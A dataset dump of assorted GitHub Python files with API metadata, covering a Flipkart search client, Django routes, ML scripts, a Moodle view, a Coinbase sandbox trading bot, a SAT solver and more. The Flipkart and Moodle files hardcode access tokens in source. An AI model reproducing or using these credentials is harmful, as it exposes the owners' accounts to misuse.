"torch.utils.data", "line_number": 20, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 35, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 47, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 52, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 59, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 59, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 59, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 60, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 60, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 80, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 80, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 83, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 84, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 85, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 85, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 88, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}]}
+{"seq_id": "5091960940", "text": "import requests, json, pprint, time\nimport hashlib\nimport base64\n\nURL_SEARCH = \"https://affiliate-api.flipkart.net/affiliate/1.0/search.json\"\n\nheaders = { 'Fk-Affiliate-Id' : 'sujithejg',\n 'Fk-Affiliate-Token' : '1e3c864a20654c95ab56a300906e1d69',\n 'Content-Type' : 'application/json',\n }\n\ndef query(query_str):\n params = {\n 'query' : query_str,\n 'resultCount' : 5\n }\n response = requests.get(URL_SEARCH, headers=headers, params=params)\n res = response.json()\n print(res)\n product_id = res['products'][0]['productBaseInfoV1']\n print('\\n')\n print(product_id)\n print('\\n')\n #for k, v in product_id.items():\n print('\\n')\n print(product_id.get(\"productId\"))\n print('\\n')\n #return jsonData\n\nif __name__==\"__main__\":\n query('sony mobile');\n print(\"\\n\\n\\n\\n QUERYING IPOD \\n\\n\\n\\n\");\n query('ipod')\n", "repo_name": "snehadasa/Graphit_project", "sub_path": "query_api/query_flipkart_id.py", "file_name": "query_flipkart_id.py", "file_ext": "py", "file_size_in_byte": 915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "69921767449", "text": "# accounts/urls.py\n\nfrom django.urls import path, re_path\nfrom .views.users import active_users, current_user, Login, logout, Register, users, EditUser\nfrom .views.skins import available_skins, ActiveUserSkin, PurchasedUserSkins\nfrom .views.stats import Stats\nfrom .views.wallet import WalletAPI\n\nurlpatterns = [\n # Users\n path('users/current/', current_user),\n path('users/', users),\n path('users/active/', active_users),\n re_path(r'signup|register/$', Register.as_view(), name='account-create'),\n re_path(r'signin|login/$', Login.as_view(), name='account-login'),\n re_path(r'signout|logout/$', logout, name='account-logout'),\n path('users/edit/', EditUser.as_view()),\n # Skins\n path('skins/', available_skins),\n path('skins/active/', ActiveUserSkin.as_view()),\n path('skins/purchased/', PurchasedUserSkins.as_view()),\n # Stats\n re_path(r'stats|statistics/$', Stats.as_view()),\n # Wallet\n path('wallet/', WalletAPI.as_view())\n]\n", "repo_name": "cs188-software-design-security-w20/project-reiher-s-revenge", "sub_path": "backend/accounts/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 977, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.users.current_user", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "views.users.users", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "views.users.active_users", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.re_path", "line_number": 14, "usage_type": "call"}, {"api_name": "views.users.Register.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "views.users.Register", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 15, "usage_type": "call"}, {"api_name": "views.users.Login.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "views.users.Login", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.users.logout", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.users.EditUser.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.users.EditUser", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "views.skins.available_skins", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "views.skins.ActiveUserSkin.as_view", "line_number": 20, "usage_type": "call"}, {"api_name": "views.skins.ActiveUserSkin", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "views.skins.PurchasedUserSkins.as_view", "line_number": 21, "usage_type": "call"}, {"api_name": "views.skins.PurchasedUserSkins", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 23, "usage_type": "call"}, {"api_name": "views.stats.Stats.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "views.stats.Stats", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "views.wallet.WalletAPI.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "views.wallet.WalletAPI", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "18632807620", "text": "\nfrom sklearn import tree, metrics\n\nimport csv\n\n\ndef DT_2(alpha, delta)->int:\n\n #build And Train the tree\n\n class_weight_dict={'0':(1-delta) , '1':delta} #delta value is 0.8\n DT2 = tree.DecisionTreeClassifier(criterion=\"entropy\",min_samples_split=9 , class_weight=class_weight_dict)\n DT2.fit(train_data,train_results)\n\n\n #Test the tree\n #DT2_results = DT2.predict(test_data)\n DT2_prob_results=DT2.predict_proba(test_data)\n #Generate prediction tree\n\n\n delta_weighted_pred_result=[]\n for c_prob in DT2_prob_results:\n if alpha*c_prob[1]> c_prob[0]: # calculate classification by new rule alpha*|T|>|F|\n delta_weighted_pred_result.append('1')\n else:\n delta_weighted_pred_result.append('0')\n conf_mat1=metrics.confusion_matrix(test_results,delta_weighted_pred_result)\n\n conf_mat1[0][0],conf_mat1[1][1]=conf_mat1[1][1],conf_mat1[0][0]\n errw=conf_mat1[0][1]+4*conf_mat1[1][0]\n\n print(conf_mat1)\n\n return errw\n\n\n\n\n\n#Read Train file\n\n\ntrain_file = open('train.csv')\ndata = csv.reader(train_file, delimiter=',')\ntrain_data, train_results = [], []\nfor row in data:\n train_data.append(row[0:8])\n train_results.append(row[8])\ntrain_data, train_results=train_data[1:len(train_data)],train_results[1:len(train_results)]\n\n\n#Load test file\ntest_file = open('test.csv')\ndata = csv.reader(test_file, delimiter=',')\ntest_data,test_results = [], []\nfor row in data:\n test_data.append(row[0:8])\n test_results.append(row[8])\ntest_data, test_results=test_data[1:len(test_data)], test_results[1:len(test_results)]\n\n\ndelta=0.8\nalpha=4\nDT_2(alpha,delta)\n\n\n\n", "repo_name": "omertaub7/intro_ai_3", "sub_path": "DT2.py", "file_name": "DT2.py", "file_ext": "py", "file_size_in_byte": 1627, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 12, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 28, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 45, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 55, "usage_type": "call"}]}
+{"seq_id": "31923104923", "text": "from django.shortcuts import render\nfrom django.http.request import HttpRequest\nfrom urllib.request import urlopen\nimport json\n\n\n# global token\n# global url\n# Create your views here.\n\n\ndef index(req:HttpRequest):\n \n \n if req.method == 'POST':\n\n \n \n '''\n main vars\n '''\n token = 'b7d481ee5afe361cc31f5ee05bb8968c'\n url = 'https://moodle-138098-0.cloudclusters.net/webservice/rest/server.php?'\n available_cources = []\n avilable_Category_for_cources = []\n categories = []\n\n \n \n \n '''\n not favrite\n\n is favorite\n '''\n \n \n '''\n Get courses\n '''\n urlcourse = f'{url}wstoken={token}&wsfunction=core_enrol_get_users_courses&userid=2&moodlewsrestformat=json'\n datacourse = urlopen(urlcourse).read()\n formattedcourses = json.loads(datacourse)\n for i in formattedcourses:\n available_cources.append(i)\n \n \n \n '''\n Get categories\n '''\n \n urlCate = f'{url}wstoken={token}&wsfunction=core_course_get_categories&moodlewsrestformat=json'\n dataCate = urlopen(urlCate).read()\n formattedCate = json.loads(dataCate)\n\n \n \n '''\n Match the ctegorie with the course\n '''\n print(formattedCate)\n for course in available_cources :\n categoryforcourse = course['category']\n for category in formattedCate:\n idcat = category['id']\n if idcat == categoryforcourse:\n categories.append(category['name'])\n \n avilable_Category_for_cources.append({\n 'name' : f\"{course['shortname']}\",\n 'categories' : categories,\n })\n print(avilable_Category_for_cources)\n var = {\n 'data' : avilable_Category_for_cources\n \n }\n return render (req, 'core/index.html', var)\n \n \n \n \n \n return render(req, 'core/index.html')", "repo_name": "omarhosnay/Testmoodle", "sub_path": "core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2236, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.http.request.HttpRequest", "line_number": 12, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 43, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 54, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 79, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 85, "usage_type": "call"}]}
+{"seq_id": "45362874938", "text": "#!/usr/bin/env python3\n\nimport sys\nfrom collections import defaultdict\nimport os\nimport time\nimport argparse\n\ndef parse_dimacs(filename):\n clauses = []\n with open(filename, 'r') as input_file:\n for line in input_file:\n if line[0] in ['c', 'p']:\n continue\n literals = list(map(int, line.split()))\n assert literals[-1] == 0\n literals = literals[:-1]\n clauses.append(literals)\n return clauses\n\n# Jersolow-Wang method\ndef jersolow_wang_method(cnf):\n literal_weight = defaultdict(int)\n for clause in cnf:\n for literal in clause:\n literal_weight[literal] += 2 ** -len(clause)\n return max(literal_weight, key=literal_weight.get)\n\n# Jersolow-Wang 2-sided method (consider only positive literals)\n# this is faster by 50% relative improvement in speed\n# ref: http://www.cril.univ-artois.fr/~coste/Articles/coste-etal-sat05.pdf\ndef jersolow_wang_2_sided_method(cnf):\n literal_weight = defaultdict(int)\n for clause in cnf:\n for literal in clause:\n literal_weight[abs(literal)] += 2 ** -len(clause)\n return max(literal_weight, key=literal_weight.get)\n\n# Boolean Constrain Propagation\n# we set unit to true and so we need to update the cnf by the following rules:\n# - Clauses that contain unit are removed (due to \"or\")\n# - Update clauses by removing -unit from them if it exist (due to \"or\")\ndef bcp(cnf, unit):\n new_cnf = []\n for clause in cnf:\n if unit in clause:\n continue\n if -unit in clause:\n new_clause = [literal for literal in clause if literal != -unit]\n # base case: conjunct containing an empty disjunct so False\n # but we should continue later because there might be another path\n if not new_clause:\n return -1\n new_cnf.append(new_clause)\n else:\n new_cnf.append(clause)\n return new_cnf\n\n# This implements the while loop of the BCP function\ndef assign_unit(cnf):\n I = [] # contains the bool assignments for each variable\n unit_clauses = [clause for clause in cnf if len(clause) == 1]\n while unit_clauses:\n unit = unit_clauses[0][0]\n cnf = bcp(cnf, unit) # assign true to unit\n I += [unit]\n if cnf == -1:\n return -1, []\n # base case: empty conjunct so it is SAT\n if not cnf:\n return cnf, I\n unit_clauses = [clause for clause in cnf if len(clause) == 1] # update\n return cnf, I\n\n# DPLL algorithm is here\ndef backtrack(cnf, I):\n cnf, unit_I = assign_unit(cnf)\n I = I + unit_I\n if cnf == -1:\n return []\n if not cnf:\n \treturn I\n selected_literal = jersolow_wang_2_sided_method(cnf)\n res = backtrack(bcp(cnf, selected_literal), I + [selected_literal])\n # if no solution when assigning to True, try to assign to False\n if not res:\n res = backtrack(bcp(cnf, -selected_literal), I + [-selected_literal])\n return res\n\ndef run_benchmarks(fname):\n print('Running on benchmarks...')\n start_time = time.time()\n with open(fname, 'w') as out_file:\n for filename in os.listdir(\"benchmarks\"):\n clauses = parse_dimacs(os.path.join(\"benchmarks\", filename))\n assignment = backtrack(clauses, [])\n if assignment:\n out_file.write('SAT')\n else:\n out_file.write('UNSAT')\n out_file.write('\\n')\n end_time = time.time()\n print('Execution time: %.2f seconds' % (end_time - start_time))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--run_benchmarks', action='store_true',\n help='Run the sat solver over all files in the benchmarks folder')\n parser.add_argument('--input_file', default=None,\n help='input file following DIMACS format (ignored if run_benchmarks is set to True')\n args = parser.parse_args()\n if args.run_benchmarks:\n run_benchmarks('benchmarks-results.log')\n elif args.input_file is not None:\n f = args.input_file\n assert os.path.exists(f), '{} does not exists'.format(f)\n clauses = parse_dimacs(f)\n assignment = backtrack(clauses, [])\n if assignment:\n print('SAT')\n assignment.sort(key=lambda x: abs(x))\n print(assignment)\n else:\n print('UNSAT')\n else:\n print('Please either choose an input file or run the benchmarks. Type --help for more details')\n", "repo_name": "mmz33/DPLL-SAT-Solver", "sub_path": "sat_dpll.py", "file_name": "sat_dpll.py", "file_ext": "py", "file_size_in_byte": 4142, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.defaultdict", "line_number": 23, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 33, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 102, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}]}
+{"seq_id": "40858927066", "text": "from PIL import Image\n\n# открываем картинку\nimg = Image.open(\"cat.jpg\")\npixels = img.load()\n\n# размеры\nprint(img.width, img.height)\n\nfor x in range(img.width//4):\n for y in range(img.height):\n r, g, b = pixels[x, y]\n\n a = (r+g+b)//3\n\n pixels[x, y] = (a, a, a)\n\nfor x in range(3*img.width//4, img.width):\n for y in range(img.height):\n r, g, b = pixels[x, y]\n\n a = (r+g+b)//3\n\n pixels[x, y] = (a, a, a)\n\nimg.show()\n", "repo_name": "roctbb/GoTo-Summer-17-3", "sub_path": "Day 2 - Pillow/grey.py", "file_name": "grey.py", "file_ext": "py", "file_size_in_byte": 485, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PIL.Image.open", "line_number": 4, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 4, "usage_type": "name"}]}
+{"seq_id": "42400383149", "text": "'''\nTake the raw MSCOCO annotation files (like instances_train2014.json) and creates a csv where each lines is an example:\n12746,0,1,0,0,0,...1,0\n(12746 is the image id and the rest is the ground truth of each class)\n'''\nimport json\nimport os\nimport sys\n\nimport numpy as np\n\nfrom collections import defaultdict\nfrom pprint import pprint\n\n\ndef categories(json_data):\n cats = dict()\n for i, category in enumerate(sorted(json_data['categories'], key=lambda x: x['id'])):\n cats[category['id']] = {'name': category['name'], 'norm_id': i}\n\n assert len(cats) == 80\n return cats\n\n\ndef write_categories(root_dir, cats):\n '''\n normalized_id,name,original_id\n '''\n categories_file = os.path.join(root_dir, 'annotations', 'categories.csv')\n\n with open(categories_file, 'w+') as f_out:\n for key in sorted(cats, key=lambda x: cats[x]['norm_id']):\n line = '%s,%s,%s\\n' % (cats[key]['norm_id'], cats[key]['name'], key)\n f_out.write(line)\n\n\ndef write_dataset(root_dir, original_name, id_to_label):\n dataset_file = os.path.join(root_dir, 'annotations', 'multilabel_%s.csv' % original_name)\n with open(dataset_file, 'w+') as f_out:\n\n for img_id in sorted(id_to_label):\n ground_truth = [str(int(gt)) for gt in id_to_label[img_id]]\n line = str(img_id) + ',' + ','.join(ground_truth) + '\\n'\n f_out.write(line)\n\n\ndef create_csv(root_dir, original_name):\n\n annotations_file = os.path.join(root_dir, 'annotations', 'instances_%s.json' % original_name)\n with open(annotations_file, 'r') as f_in:\n json_data = json.load(f_in)\n\n # create categories file\n cats = categories(json_data)\n nb_classes = len(cats)\n\n # init image_ids\n id_to_label = dict()\n for img in json_data['images']:\n img_id = img['id']\n id_to_label[img_id] = np.zeros(nb_classes)\n\n # fill with data\n stats = defaultdict(int)\n for annot in json_data['annotations']:\n cat = annot['category_id']\n norm_cat = cats[cat]['norm_id']\n stats[cat] += 1\n\n img_id = annot['image_id']\n\n id_to_label[img_id][norm_cat] = 1\n pprint(stats)\n\n # write categories file\n write_categories(root_dir, cats)\n\n # write data csv file\n write_dataset(root_dir, original_name, id_to_label)\n\n\n# python3 pp_multilabel.py /share/DEEPLEARNING/datasets/mscoco train2017\nif __name__ == '__main__':\n create_csv(sys.argv[1], sys.argv[2])\n", "repo_name": "lcalem/partial-labels", "sub_path": "data/coco/preprocessing/pp_multilabel.py", "file_name": "pp_multilabel.py", "file_ext": "py", "file_size_in_byte": 2454, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 61, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 64, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 73, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 84, "usage_type": "attribute"}]}
+{"seq_id": "24430435501", "text": "from tkinter import Scale\r\nfrom sdl2.sdlmixer import Mix_Volume\r\n\r\n\r\nclass VolumeScale(Scale):\r\n def __init__(self, **kwargs):\r\n Scale.__init__(self, **kwargs)\r\n self.config(\r\n orient='horizontal', from_=0, to=100, bg='aqua',\r\n command=lambda v: Mix_Volume(-1, int(v))\r\n )\r\n self.set(100)\r\n self.pack(anchor='w', side='left')", "repo_name": "GojoXEnryu/CourseProject", "sub_path": "CustomAudioEditor/vscale.py", "file_name": "vscale.py", "file_ext": "py", "file_size_in_byte": 385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tkinter.Scale", "line_number": 5, "usage_type": "name"}, {"api_name": "tkinter.Scale.__init__", "line_number": 7, "usage_type": "call"}, {"api_name": "tkinter.Scale", "line_number": 7, "usage_type": "name"}, {"api_name": "sdl2.sdlmixer.Mix_Volume", "line_number": 10, "usage_type": "call"}]}
+{"seq_id": "15252276382", "text": "import websocket, json\r\nimport dateutil.parser\r\nimport cbpro\r\nfrom CoinbasePro.Keys import sandbox_b64secret, sandbox_key as key, sandbox_secret as passphrase\r\n\r\nminutes_processed = {}\r\nminute_candlesticks = []\r\ncurrent_tick = None\r\nprevious_tick = None\r\n\r\nin_position = False\r\ntest_fund = 100.0\r\n\r\nBTC_id = 'ecd6a272-670b-4453-aa19-2e9617ac2087'\r\nUSD_id = '93a22eef-7d25-43de-8f3c-cce834bd6c06'\r\n\r\n\r\ndef get_balance(id):\r\n return auth_client.get_account(id)['balance']\r\n\r\n\r\ndef three_soldiers_check():\r\n last_candle = minute_candlesticks[-2]\r\n previous_candle = minute_candlesticks[-3]\r\n first_candle = minute_candlesticks[-4]\r\n\r\n print(\"== Let's compare the last 3 candle closes ==\")\r\n if last_candle['close'] > previous_candle['close'] and previous_candle['close'] > first_candle['close']:\r\n print(\"=== Three green candlesticks in a row, let's make a trade! ===\")\r\n distance = last_candle['close'] - first_candle['open']\r\n print(\"Distance is {}\".format(distance))\r\n profit_price = last_candle['close'] + (distance * 2)\r\n print(\"I will take profit at {}\".format(profit_price))\r\n loss_price = first_candle['open']\r\n print(\"I will sell for a loss at {}\".format(loss_price))\r\n return True, profit_price, loss_price\r\n return False\r\n\r\n\r\ndef on_open(ws):\r\n print(\"Opened connection\")\r\n\r\n subscribe_message = {\r\n \"type\": \"subscribe\",\r\n \"channels\": [\r\n {\r\n \"name\": \"ticker\",\r\n \"product_ids\": [\r\n \"BTC-USD\"\r\n ]\r\n }\r\n ]\r\n }\r\n ws.send(json.dumps(subscribe_message))\r\n\r\n\r\ndef on_message(ws, message):\r\n global current_tick, previous_tick, in_position\r\n profit_price = 0\r\n loss_price = 0\r\n previous_tick = current_tick\r\n current_tick = json.loads(message)\r\n # print(message)\r\n # print(current_tick)\r\n\r\n # print(\"=== Received Tick ===\")\r\n # print(\"{} @ {}\".format(current_tick['time'], current_tick['price']))\r\n\r\n tick_datetime_object = dateutil.parser.parse(current_tick['time'])\r\n tick_dt = tick_datetime_object.strftime(\"%m/%d/%Y %H:%M\")\r\n # print(tick_datetime_object.minute)\r\n # print(tick_dt)\r\n\r\n if not tick_dt in minutes_processed:\r\n # print(\"Starting new candlestick\")\r\n minutes_processed[tick_dt] = True\r\n # print(minutes_processed)\r\n\r\n if len(minute_candlesticks) > 0:\r\n minute_candlesticks[-1]['close'] = previous_tick['price']\r\n if minute_candlesticks[-1]['open'] > minute_candlesticks[-1]['close']:\r\n minute_candlesticks[-1]['NET'] = 'Loss'\r\n elif minute_candlesticks[-1]['open'] < minute_candlesticks[-1]['close']:\r\n minute_candlesticks[-1]['NET'] = 'Profit'\r\n else:\r\n minute_candlesticks[-1]['NET'] = 'Same'\r\n\r\n minute_candlesticks.append({\r\n \"minute\": tick_dt,\r\n \"open\": current_tick['price'],\r\n \"high\": current_tick['price'],\r\n \"low\": current_tick['price']\r\n })\r\n\r\n if len(minute_candlesticks) > 0:\r\n current_candlestick = minute_candlesticks[-1]\r\n if current_tick['price'] > current_candlestick['high']:\r\n current_candlestick['high'] = current_tick['price']\r\n if current_tick['price'] < current_candlestick['low']:\r\n current_candlestick['low'] = current_tick['price']\r\n\r\n print(\"=== CandleSticks ===\")\r\n for candlestick in minute_candlesticks:\r\n print(candlestick)\r\n\r\n if len(minute_candlesticks) > 4:\r\n print(\"== There are too many candlesticks ==\")\r\n print(\"== Removing a candlesticks ==\")\r\n minute_candlesticks.pop(0)\r\n\r\n if len(minute_candlesticks) > 3:\r\n print(\"== There are more than 3 candlesticks, checking for pattern ==\")\r\n last_candle = minute_candlesticks[-2]\r\n previous_candle = minute_candlesticks[-3]\r\n first_candle = minute_candlesticks[-4]\r\n # print(type(last_candle['close']))\r\n\r\n print(\"== Let's compare the last 3 candle closes ==\")\r\n if float(last_candle['close']) > float(previous_candle['close']) and float(previous_candle['close']) > float(first_candle['close']):\r\n print(\"=== Three green candlesticks in a row, let's make a trade! ===\")\r\n\r\n distance = float(last_candle['close']) - float(first_candle['open'])\r\n if distance >= 0:\r\n print(\"Distance is {}\".format(distance))\r\n profit_price = float(last_candle['close']) + (distance * 2)\r\n print(\"I will take profit at {}\".format(profit_price))\r\n loss_price = float(first_candle['open'])\r\n print(\"I will sell for a loss at {}\".format(loss_price))\r\n\r\n if not in_position:\r\n print(\"== Placing order and setting in position to true\")\r\n in_position = True\r\n # place_order(profit_price, loss_price)\r\n print(\"=== PLACED ORDER ===\")\r\n auth_client.place_market_order(product_id='BTC-USD', side='buy', funds='100.0')\r\n auth_client.place_limit_order(product_id='BTC-USD', side='sell', price=profit_price, size=get_balance(BTC_id))\r\n auth_client.place_limit_order(product_id='BTC-USD', side='sell', price=loss_price, size=get_balance(BTC_id))\r\n\r\n if in_position:\r\n exit()\r\n\r\n\r\n\r\n\r\n# socket = \"wss://ws-feed.pro.coinbase.com\"\r\nsocket = 'wss://ws-feed-public.sandbox.pro.coinbase.com'\r\n\r\n###Authenticated Client###\r\nauth_client = cbpro.AuthenticatedClient(key, sandbox_b64secret, passphrase,\r\n api_url=\"https://api-public.sandbox.pro.coinbase.com\")\r\n# print(auth_client.get_account(BTC_id))\r\n# print(\"The amount of USD: {}\".format(get_balance(USD_id)))\r\n# print(\"The amount of BTC: {}\".format(get_balance(BTC_id)))\r\n# auth_client.buy(product_id='BTC-USD', order_type='market', funds='100.0')\r\n# auth_client.sell(product_id='BTC-USD', order_type='stop', funds='100.0')\r\n# print(\"The amount of USD: {}\".format(get_balance(USD_id)))\r\n# print(\"The amount of BTC: {}\".format(get_balance(BTC_id)))\r\n\r\nws = websocket.WebSocketApp(socket, on_open=on_open, on_message=on_message)\r\nws.run_forever()\r\n# wsClient = cbpro.WebsocketClient(url=socket,\r\n# products=[\"BTC-USD\"],\r\n# channels=[\"ticker\"])\r\n# wsClient.start()\r\n\r\n\r\n# print(auth_client.get_accounts())\r\n# print(get_balance(USD_id))\r\n", "repo_name": "yaz231/CoinbasePro", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 6677, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.dumps", "line_number": 54, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 62, "usage_type": "call"}, {"api_name": "dateutil.parser.parser.parse", "line_number": 69, "usage_type": "call"}, {"api_name": "dateutil.parser.parser", "line_number": 69, "usage_type": "attribute"}, {"api_name": "dateutil.parser", "line_number": 69, "usage_type": "name"}, {"api_name": "cbpro.AuthenticatedClient", "line_number": 149, "usage_type": "call"}, {"api_name": "CoinbasePro.Keys.sandbox_key", "line_number": 149, "usage_type": "argument"}, {"api_name": "CoinbasePro.Keys.sandbox_b64secret", "line_number": 149, "usage_type": "argument"}, {"api_name": "CoinbasePro.Keys.sandbox_secret", "line_number": 149, "usage_type": "argument"}, {"api_name": "websocket.WebSocketApp", "line_number": 159, "usage_type": "call"}]}
+{"seq_id": "26820922745", "text": "from rail_real_walker import *\nfrom rail_real_walker.robots import Go1RealWalker, Go1RealWalkerRemote\nfrom rail_walker_interface import BaseWalker, BaseWalkerLocalizable, Walker3DVelocityEstimator\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nTICK_TIMESTEP = 0.03\n\ndef init_estimator() -> Walker3DVelocityEstimator:\n return DummyVelocityEstimator()\n\ndef interpolate_next_action(robot : Go1RealWalker, step : int):\n init_coefficient = (np.sin(np.pi * 2 * step / 50) + 1) / 2.0\n sit_coefficient = 1.0 - init_coefficient\n return init_coefficient * robot.joint_qpos_init + sit_coefficient * robot.joint_qpos_sitting\n\n\nif __name__ == \"__main__\":\n estimator_instance = init_estimator()\n print(\"Estimator type: \", type(estimator_instance))\n robot = Go1RealWalker(\n estimator_instance,\n power_protect_factor=0.5,\n Kp=40,\n Kd=5\n )\n \n try:\n with plt.ion():\n plt.xlim(-1, 1)\n plt.ylim(-1, 1)\n FR_thigh_arrow = plt.arrow(0, 0, 0, 0, head_width=0.05, width=0.05, color='r')\n 